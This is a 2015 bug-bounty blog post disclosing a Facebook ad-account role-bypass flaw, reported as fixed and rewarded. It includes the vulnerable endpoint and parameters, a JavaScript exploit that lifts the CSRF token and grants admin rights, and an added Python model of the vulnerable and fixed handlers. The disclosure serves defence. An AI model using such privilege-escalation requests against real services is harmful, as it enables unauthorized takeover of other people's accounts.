Sunday, March 15, 2015

Bypass ad account roles vulnerability 2015


facebook exploit 2015

I discovered a vulnerability in Facebook that allowed a normal user of an ad account to gain unauthorized admin access to that ad account.

Admins of an ad account can add any user to their ad account with one of these three roles:

  1. admin
  2. advertiser
  3. analyst

Read more about these roles: link

Facebook launched Business Manager in 2014 to help businesses and agencies manage their Facebook Pages; it is accessible from

In Business Manager, a business account can assign agencies to its own ad accounts, so that those agencies get limited access to the ad accounts (the owner sets this access level during the assign-agency process).

The vulnerability I found allowed agencies with a normal role (advertiser or analyst, roles 2 and 3 above) to change their own access to admin.

Scenario:

I have a business account and I give analyst permission to another business account to work on my ad account.
That business account can bypass the role check and get admin access.


With only analyst permission in any ad account, send this request:

request url:

POST /ads/manage/settings/permissions/?action=add_user

request body:

act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission: 1001 admin, 1002 advertiser, 1003 analyst]

Exploit:

var xhr = new XMLHttpRequest();
// the ".open(" call was lost from the original listing and is restored here
xhr.open("POST", "/ads/manage/settings/permissions/?action=add_user", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
// CSRF token taken from the current page (the original line was missing the "&" separator)
p += "&fb_dtsg=" + document.getElementsByName("fb_dtsg")[0].value;
xhr.send(p);

__ACCID__ = ad account id
__USERID__ = this user will be the new admin ;)
__PERM__ = permission (1001, 1002, 1003)
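To show where the missing server-side check belongs, here is an added Python model of the add_user_permission handler (not the original post's code and not Facebook's implementation): the vulnerable variant only checks that the caller is some member of the ad account, while the fixed variant requires the caller's effective role, including the role an owner assigned to the caller's agency, to be admin before any role can be granted. The AdAccount data model, the account and user ids, and the function names are constructed assumptions; the role codes are the ones from the request body above.

```python
from dataclasses import dataclass, field

ADMIN, ADVERTISER, ANALYST = 1001, 1002, 1003  # role codes as used in the report's request body
VALID_ROLES = {ADMIN, ADVERTISER, ANALYST}

class Forbidden(Exception):
    """Raised when the caller may not perform the requested role change."""

@dataclass
class AdAccount:  # constructed data model, not Facebook's
    act: str                                          # ad account id
    user_roles: dict = field(default_factory=dict)    # user_id -> role of direct members
    agency_roles: dict = field(default_factory=dict)  # business_id -> role the owner assigned to that agency

def effective_role(account, user_id, business_id=None):
    """Role the caller really holds: a direct role, else the role the owner gave the caller's agency."""
    if user_id in account.user_roles:
        return account.user_roles[user_id]
    return account.agency_roles.get(business_id)

def add_permission_vulnerable(account, caller_id, target_id, role, business_id=None):
    """Constructed model of the reported behaviour: any member, even an analyst, can hand out any role."""
    if effective_role(account, caller_id, business_id) is None:
        raise Forbidden("caller is not a member of this ad account")
    account.user_roles[target_id] = role
    return role

def add_permission_fixed(account, caller_id, target_id, role, business_id=None):
    """Hardened handler: the role code must be known and only an admin may assign roles."""
    if role not in VALID_ROLES:
        raise Forbidden(f"unknown role code {role}")
    if effective_role(account, caller_id, business_id) != ADMIN:
        raise Forbidden("only ad account admins may assign roles")
    account.user_roles[target_id] = role
    return role

def scenario_account():
    """The report's setup: the owner is admin and an agency business was assigned analyst access."""
    return AdAccount("act_1", user_roles={"owner": ADMIN}, agency_roles={"agency_biz": ANALYST})

def demo():
    """Replay the scenario: returns (role gained on the weak server, fixed server refused?, role on fixed server)."""
    weak, fixed = scenario_account(), scenario_account()
    add_permission_vulnerable(weak, "agency_user", "agency_user", ADMIN, business_id="agency_biz")
    try:
        add_permission_fixed(fixed, "agency_user", "agency_user", ADMIN, business_id="agency_biz")
        blocked = False
    except Forbidden:
        blocked = True
    return weak.user_roles["agency_user"], blocked, fixed.user_roles.get("agency_user")
```

Running demo() returns (1001, True, None): the analyst-level agency becomes admin on the weak server and is refused, with no role written, on the fixed one.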

POC:

I removed some sections that showed user ids or emails.


  • Mar 14, 2015 01:27am: Initial report
  • Mar 17, 2015 03:35am: Bug acknowledged by security team
  • Mar 17, 2015 08:00am: Security team member Reginaldo informed me the vulnerability was fixed
  • Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with $8000.
